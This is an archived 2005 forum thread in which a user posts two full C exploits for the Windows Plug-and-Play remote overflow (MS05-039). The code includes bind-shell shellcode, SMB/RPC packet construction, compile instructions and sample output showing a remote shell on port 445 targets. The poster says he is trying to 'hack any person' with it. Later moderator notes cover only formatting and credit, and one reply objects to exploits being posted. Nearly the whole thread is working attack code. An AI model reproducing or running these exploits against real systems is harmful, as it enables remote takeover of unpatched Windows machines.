Nov 21, 2009

Microsoft Windows Plug-and-play Service Remote Ove

 		free web hosting
Open Discussion > MODERATED AREA > Computers > Computer Security Issues & Exploits

Microsoft Windows Plug-and-play Service Remote Ove

st4r-s4t
Aug 12 2005, 01:42 PM
This is the c code you can compile it with lcc win 32 or gcc or virtual c++ ...
CODE

/*
Windows 2000 universal exploit for MS05-039
-\x6d\x35\x6c\x30\x6e\x6e\x79-
*/

#define WIN32_LEAN_AND_MEAN

#include <windows.h>
#include <winnetwk.h>
#include <winsock.h>
#include <Rpc.h>
#include <wchar.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")

BYTE Data1[0x68] =
{0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00,
0x52,0x00,0x4F,0x00,0x4F,0x00,0x54,0x00,0x5C,0x00,0x53,0x00,
0x59,0x00,0x53,0x00,0x54,0x00,0x45,0x00,0x4D,0x00,0x5C,0x00,
0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x00,0x00,0x00,0x00,
0xFF,0xFF,0x00,0x00,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0xEE,0xEE,0xEE,0xEE,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x21,0x00,0x00,0x00,
0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
struct DataStruct1
{
BYTE SomeString[0x30];
DWORD RESDataType;
DWORD LFD;
DWORD SDM1;
DWORD SDO;
DWORD SDL;
DWORD SDM2;
BYTE SDA[0x07D0];
DWORD LRD;
DWORD MB;
DWORD DM;
};
struct RPCBIND
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
WORD MaxXmitFrag;
WORD MaxRecvFrag;
DWORD AssocGroup;
BYTE NumCtxItems;
WORD ContextID;
WORD NumTransItems;
GUID InterfaceUUID;
WORD InterfaceVerMaj;
WORD InterfaceVerMin;
GUID TransferSyntax;
DWORD SyntaxVer;
};
//from metasploit, before you were born
BYTE BindShell[374]={"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
"\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53"
"\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4"
"\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9"
"\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d"
"\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51"
"\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54"
"\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff"
"\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x22\x11\x89\xe0\x6a"
"\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55"
"\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c"
"\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10"
"\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c"
"\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49"
"\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff"
"\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3"
"\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55"
"\x04\x31\xdb\x53\xff\xd0"};
BYTE PRPC[0x48] =
{0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00
,
0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,

0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,

0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,

0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
struct RPCFUNC
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
DWORD AllocHint;
WORD ContextID;
WORD Opnum;
};
BYTE POP[0x27] =
{0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xAC,0x10,0x00,0x00,0x01,0x00,0x00,0x00
,
0x94,0x10,0x00,0x00,0x00,0x00,0x09,0x00,0x05,0x08,0x00,0x00,0x00,0x00,0x00,0x00,

0x05,0x08,0x00,0x00,0x41,0x00,0x41};

int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer)
{
BYTE rbuf[0x1000];
DWORD dw;
struct RPCBIND RPCBind;

memcpy(&RPCBind,&PRPC,sizeof(RPCBind));
UuidFromString(Interface,&RPCBind.InterfaceUUID);
UuidToString(&RPCBind.InterfaceUUID,&Interface);
RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);
RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);
TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf, sizeof(rbuf), &dw, NULL);
return 0;
}

int Attack(HANDLE PipeHandle)
{
struct RPCFUNC RPCOP;
int bwritten=0;
BYTE *LargeBuffer;
BYTE rbuf[0x100];
DWORD dw;
struct DataStruct1 EvilRPC;

memcpy(&EvilRPC,&Data1,sizeof(EvilRPC));
EvilRPC.SDL=0x07C0;
memset(EvilRPC.SDA,0x90,0x07D0);
EvilRPC.SDA[76]=0x3e;
EvilRPC.SDA[77]=0x1e;
EvilRPC.SDA[78]=0x02;

EvilRPC.SDA[79]=0x75;
memset(EvilRPC.SDA+80,0x90,10);
EvilRPC.SDA[90]=0x90;
memcpy(EvilRPC.SDA+94,BindShell,374);
EvilRPC.MB=0x00000004;
EvilRPC.DM=0x00000000;
EvilRPC.LFD=0x000007E0;
EvilRPC.LRD=0x000007E0;
memcpy(&RPCOP,&POP,sizeof(RPCOP));
RPCOP.Opnum = 54;
RPCOP.FragLength=sizeof(RPCOP)+sizeof(EvilRPC);
RPCOP.AllocHint=sizeof(EvilRPC);
LargeBuffer=malloc(sizeof(RPCOP)+sizeof(EvilRPC));
memset(LargeBuffer,0x00,sizeof(RPCOP)+sizeof(EvilRPC));
memcpy(LargeBuffer,&RPCOP,sizeof(RPCOP));
memcpy(LargeBuffer+sizeof(RPCOP),&EvilRPC,sizeof(EvilRPC));
printf("Sending payload...\nThis has to time out... ctrl+c after 5 secs\ncheck for shell on port 8721");
TransactNamedPipe(PipeHandle, LargeBuffer, sizeof(RPCOP)+sizeof(EvilRPC), rbuf, sizeof(rbuf), &dw, NULL);
free(LargeBuffer);
return 0;
}


int main(int argc, char* argv[])
{
char *server;
NETRESOURCE nr;
char unc[MAX_PATH];
char szPipe[MAX_PATH];
HANDLE hFile;

if (argc < 2)
{
printf("Usage: %s <host>\n", argv[0]);
return 1;
}
server=argv[1];
_snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server);
unc[sizeof(unc)-1] = 0;
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpRemoteName = unc;
nr.lpProvider = NULL;
WNetAddConnection2(&nr, "", "", 0);

_snprintf(szPipe, sizeof(szPipe), "\\\\%s\\pipe\\browser",server);
hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);

BindRpcInterface(hFile,"8d9f4e40-a03d-11ce-8f69-08003e30051b","1.0");

//SendMalformed RPC request
Attack(hFile);
return 0;
}



Notice from snlildude87:
Credits adjusted.

Remember to preview posts before posting to avoid something like this in the future


Notice from cmatcmextra:
[-codebox-] tags used instead. Should shorten the page size up ... a bit tongue.gif

 

 

 


Comment/Reply (w/o sign-up)

eXtreme
Aug 12 2005, 03:18 PM
Errr... really what do you mean with this topic??

Please explain better, i can only see some bunch of OS code, and the subject talking about " Microsoft Windows Plug-and-play Service Remote Ove"

Comment/Reply (w/o sign-up)

st4r-s4t
Aug 12 2005, 08:47 PM
oh ok i am sory this is the new vuln of plug and play it`s name is:
MS Windows Plug-and-Play Service Remote Universal Exploit (MS05-039)
QUOTE
* Description:
*    A remote code execution and local elevation of privilege
*    vulnerability exists in Plug and Play that could allow an
*    attacker who successfully exploited this vulnerability to take
*    complete control of the affected system.
*
*    This is a remote code execution and local privilege elevation
*    vulnerability. On Windows 2000, an anonymous attacker could
*    remotely try to exploit this vulnerability.
*
*    On Windows XP Service Pack 1, only an authenticated user could
*    remotely try to exploit this vulnerability.
*    On Window XP Service Pack 2 and Windows Server 2003, only an
*    administrator can remotely access the affected component.
*    Therefore, on Windows XP Service Pack 2 and Windows Server 2003,
*    this is strictly a local privilege elevation vulnerability.
*    An anonymous user cannot remotely attempt to exploit this
*    vulnerability on Windows XP Service Pack 2 and Windows
*    Server 2003.
this is the other vuln of the plug and play ... and i compile it with lcc-win32 and it attack to port 445/tcp but until now i can`t hack any person with it:
other vuln of plug and play:
CODE

/* #define _WIN32 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>
#endif


unsigned char SMB_Negotiate[] =
"\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"
"\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"
"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"
"\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"
"\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
"\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"
"\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00";


unsigned char SMB_SessionSetupAndX[] =
"\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"
"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
"\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"
"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
"\x2E\x00\x30\x00\x00\x00\x00\x00";


unsigned char SMB_SessionSetupAndX2[] =
"\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46"
"\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40"
"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40"
"\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48"
"\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3"
"\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00"
"\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00"
"\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00"
"\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";


unsigned char SMB_TreeConnectAndX[] =
"\x00\x00\x00\x5A\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2F\x00\x00";



unsigned char SMB_TreeConnectAndX_[] =
"\x00\x00\x3F\x3F\x3F\x3F\x3F\x00";


/* browser */
unsigned char SMB_PipeRequest_browser[] =
"\x00\x00\x00\x66\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
"\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x10\x00\x16\x00\x00\x00"
"\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"
"\x02\x00\x00\x00\x03\x13\x00\x00\x5C\x00\x62\x00\x72\x00\x6F\x00"
"\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";


unsigned char SMB_PNPEndpoint[] =
/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */
"\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
"\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02"
"\x00\x26\x00\x00\x40\x59\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x0B\x03\x10\x00\x00\x00"
"\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11"
"\x8F\x69\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A"
"\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";



unsigned char RPC_call[] =
"\x00\x00\x08\x90\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
"\x00\x08\x60\x00\x10\x00\x00\x3C\x08\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x3C\x08\x54\x00\x02"
"\x00\x26\x00\x00\x40\x4D\x08\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x00\x03\x10\x00\x00\x00"
"\x3C\x08\x00\x00\x01\x00\x00\x00\x24\x08\x00\x00\x00\x00\x36\x00"
"\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x52\x00\x4F\x00"
"\x4F\x00\x54\x00\x5C\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00"
"\x4D\x00\x5C\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00"
"\xFF\xFF\x00\x00\xE0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xC0\x07\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"

/* jmp over - entry point */
"\xEB\x08\x90\x90"

/* pop reg; pop reg; retn; - umpnpmgr.dll */
"\x67\x15\x7a\x76" /* 0x767a1567 */

/* jmp ebx - umpnpmgr.dll
"\x6f\x36\x7a\x76" */

"\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\x90\x90\x90\x90\x90\x90\x90\xEB\x08\x90\x90\x48\x4F\x44\x88\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";


unsigned char RPC_call_end[] =
"\xE0\x07\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00";


unsigned char bind_shellcode[] =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19"
"\xf5\x04\x37\x83\xeb\xfc\xe2\xf4\xe5\x9f\xef\x7a\xf1\x0c\xfb\xc8"
"\xe6\x95\x8f\x5b\x3d\xd1\x8f\x72\x25\x7e\x78\x32\x61\xf4\xeb\xbc"
"\x56\xed\x8f\x68\x39\xf4\xef\x7e\x92\xc1\x8f\x36\xf7\xc4\xc4\xae"
"\xb5\x71\xc4\x43\x1e\x34\xce\x3a\x18\x37\xef\xc3\x22\xa1\x20\x1f"
"\x6c\x10\x8f\x68\x3d\xf4\xef\x51\x92\xf9\x4f\xbc\x46\xe9\x05\xdc"
"\x1a\xd9\x8f\xbe\x75\xd1\x18\x56\xda\xc4\xdf\x53\x92\xb6\x34\xbc"
"\x59\xf9\x8f\x47\x05\x58\x8f\x77\x11\xab\x6c\xb9\x57\xfb\xe8\x67"
"\xe6\x23\x62\x64\x7f\x9d\x37\x05\x71\x82\x77\x05\x46\xa1\xfb\xe7"
"\x71\x3e\xe9\xcb\x22\xa5\xfb\xe1\x46\x7c\xe1\x51\x98\x18\x0c\x35"
"\x4c\x9f\x06\xc8\xc9\x9d\xdd\x3e\xec\x58\x53\xc8\xcf\xa6\x57\x64"
"\x4a\xa6\x47\x64\x5a\xa6\xfb\xe7\x7f\x9d\x1a\x55\x7f\xa6\x8d\xd6"
"\x8c\x9d\xa0\x2d\x69\x32\x53\xc8\xcf\x9f\x14\x66\x4c\x0a\xd4\x5f"
"\xbd\x58\x2a\xde\x4e\x0a\xd2\x64\x4c\x0a\xd4\x5f\xfc\xbc\x82\x7e"
"\x4e\x0a\xd2\x67\x4d\xa1\x51\xc8\xc9\x66\x6c\xd0\x60\x33\x7d\x60"
"\xe6\x23\x51\xc8\xc9\x93\x6e\x53\x7f\x9d\x67\x5a\x90\x10\x6e\x67"
"\x40\xdc\xc8\xbe\xfe\x9f\x40\xbe\xfb\xc4\xc4\xc4\xb3\x0b\x46\x1a"
"\xe7\xb7\x28\xa4\x94\x8f\x3c\x9c\xb2\x5e\x6c\x45\xe7\x46\x12\xc8"
"\x6c\xb1\xfb\xe1\x42\xa2\x56\x66\x48\xa4\x6e\x36\x48\xa4\x51\x66"
"\xe6\x25\x6c\x9a\xc0\xf0\xca\x64\xe6\x23\x6e\xc8\xe6\xc2\xfb\xe7"
"\x92\xa2\xf8\xb4\xdd\x91\xfb\xe1\x4b\x0a\xd4\x5f\xf6\x3b\xe4\x57"
"\x4a\x0a\xd2\xc8\xc9\xf5\x04\x37";

#define SET_PORTBIND_PORT(buf, port) \
*(unsigned short *)(((buf)+186)) = (port)


void
convert_name(char *out, char *name)
{
unsigned long len;

len = strlen(name);
out += len * 2 - 1;
while (len--) {
  *out-- = '\x00';
  *out-- = name[len];
}
}



int
main (int argc, char **argv)
{
struct sockaddr_in addr;
struct hostent *he;
int len;
int sockfd;
unsigned short smblen;
unsigned short bindport;
unsigned char tmp[1024];
unsigned char packet[4096];
unsigned char *ptr;
char recvbuf[4096];

#ifdef _WIN32
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
#endif

printf("\n      (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
printf("\t        Universal Exploit + no crash shellcode\n\n\n");
printf("\t            Copyright © 2005 .: houseofdabus :.\n\n\n");


if (argc < 3) {
  printf("%s <host> <bind port>\n", argv[0]);
  exit(0);
}

if ((he = gethostbyname(argv[1])) == NULL) {
  printf("[-] Unable to resolve %s\n", argv[1]);
  exit(0);
}

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
  printf("[-] socket failed\n");
  exit(0);
}

addr.sin_family = AF_INET;
addr.sin_port = htons(445);
addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(addr.sin_zero), '\0', 8);



printf("\n[*] connecting to %s:445...", argv[1]);
if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
  printf("\n[-] connect failed\n");
  exit(0);
}
printf("ok\n");

printf("[*] null session...");
if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
  printf("\n[-] send failed\n");
  exit(0);
}

len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
  printf("\n[-] failed\n");
  exit(0);
}

if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
  printf("\n[-] send failed\n");
  exit(0);
}

len = recv(sockfd, recvbuf, 4096, 0);
if (len <= 10) {
  printf("\n[-] failed\n");
  exit(0);
}

if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
  printf("\n[-] send failed\n");
  exit(0);
}

len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
  printf("\n[-] failed\n");
  exit(0);
}

ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;

sprintf(tmp, "\\\\%s\\IPC$", argv[1]);
convert_name(ptr, tmp);
smblen = strlen(tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);

memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;

smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);

if (send(sockfd, packet, ptr-packet, 0) < 0) {
  printf("\n[-] send failed\n");
  exit(0);
}

len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
  printf("\n[-] failed\n");
  exit(0);
}

printf("ok\n");
printf("[*] bind pipe...");

if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
  printf("\n[-] send failed\n");
  exit(0);
}

len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
  printf("\n[-] failed\n");
  exit(0);
}

if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
  printf("\n[-] send failed\n");
  exit(0);
}

len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
  printf("\n[-] failed\n");
  exit(0);
}

printf("ok\n");
printf("[*] sending crafted packet...");

// nop
ptr = packet;
memset(packet, '\x90', sizeof(packet));

// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;

// shellcode
bindport = (unsigned short)atoi(argv[2]);
bindport ^= 0x0437;
SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
  RPC_call_end,
  sizeof(RPC_call_end)-1);

// sending...
if (send(sockfd, packet, 2196, 0) < 0) {
  printf("\n[-] send failed\n");
  exit(0);
}
printf("ok\n");
printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));

recv(sockfd, recvbuf, 4096, 0);

return 0;
}




and some info about it:
* ---------------------------------------------------------------------
* Solution:
*    http://www.microsoft.com/technet/security/...n/MS05-039.mspx
*
* ---------------------------------------------------------------------
* Systems Affected:
*    - Windows Server 2003, SP1
*    - Windows XP SP1, SP2
*    - Windows 2000 SP4
*
* ---------------------------------------------------------------------
* Tested on:
*    - Windows 2000 SP4
*
* ---------------------------------------------------------------------
* Compile:
*
* Win32/VC++  : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
* Win32/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
* Linux      : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
*
* ---------------------------------------------------------------------
* Example:
*
* C:\>HOD-ms05039-pnp-expl 192.168.0.1 7777
*
* [*] connecting to 192.168.0.22:445...ok
* [*] null session...ok
* [*] bind pipe...ok
* [*] sending crafted packet...ok
* [*] check your shell on 192.168.0.1:7777
* Ctrl+C
*
* C:\>nc 192.168.0.1 7777
*
* Microsoft Windows 2000 [Version 5.00.2195]
* © Copyright 1985-2000 Microsoft Corp.
*
* C:\WINNT\system32>
*
* ---------------------------------------------------------------------.

I Sorry because i`m iranian and ican`t speak English very good!!

I HOPE FOR ...
by

Notice from BuffaloHELP:
Whenever you copy and paste from another souce you must place QUOTE tags. Source http://www.frsirt.com/exploits/20050812.HO...-pnp-expl.c.php Credit adjusted.

Notice from Klass:
User warned as verbal warn was given prior. Also next time you post Long Code use
CODE
[codebox] [/codebox]
tags

 

 

 


Comment/Reply (w/o sign-up)

RemoteConnection
Aug 14 2005, 07:02 PM
hey , That's exploit, we can't send it here!

Comment/Reply (w/o sign-up)


Got an Opinion! Express your Views! (no registration):-
Add your Reply/ Opinion/ Views/ Comments/ Suggestion/ Questions/ Queries etc.
Posts with decent grammar & English will be accepted and please refrain from profanities.
For asking a Question, We recommend you to sign-up (for free) so that you can track the topic easily.
Nature of your Post*: Opinion/ Reply/ Comments
Question/Query
Feedback to us.
       
Name   Email
Title/Question*

This textarea will convert to Rich-Text automatically (IE, Firefox, Chrome)

Similar Topics

Keywords : microsoft, windows, plug, play, service, remote, ove

  1. Microsoft To Provide Free Anti-virus Software
    (10)
  2. A Remote Key Loagger?
    Im sitting behind you, and yet detecting keystrokes?! (2)
    Original Article (BBC) The story goes like this. You're in a hotel lobby on your laptop
    buying an expensive present with your credit card using paypal or some other recognized system. You
    enter your details while a strange man in the corner fiddles with his old style radio receiver. 3
    days later your account is empty of cash. But how? Well the answer is a key logger than can work up
    to 20m away from the target computer, that man you saw in the corner with the receiver was actually
    tuning the antennae to the electromagnetic radiation created when you hit a key. E....
  3. Windows 7-windows Live Ties
    Microsoft is at it again (0)
    In an internal memo Microsoft detailed how it plans to tie Win7 and Windows Live. It seems these
    guys never learn. They don't don't get tired of monopolizing everything. I just pray the
    anti-trust guys will do a good job on this one. Below is part of the blog by Mary Jo Foley about the
    memo titled " Microsoft internal memo details Windows 7-Windows Live ties ": " In
    January, I mentioned an internal Microsoft memo I had seen which provided details of how Microsoft
    plans to more tightly integrate its Windows 7 operating system with Windows Live service....
  4. Xp Sp3
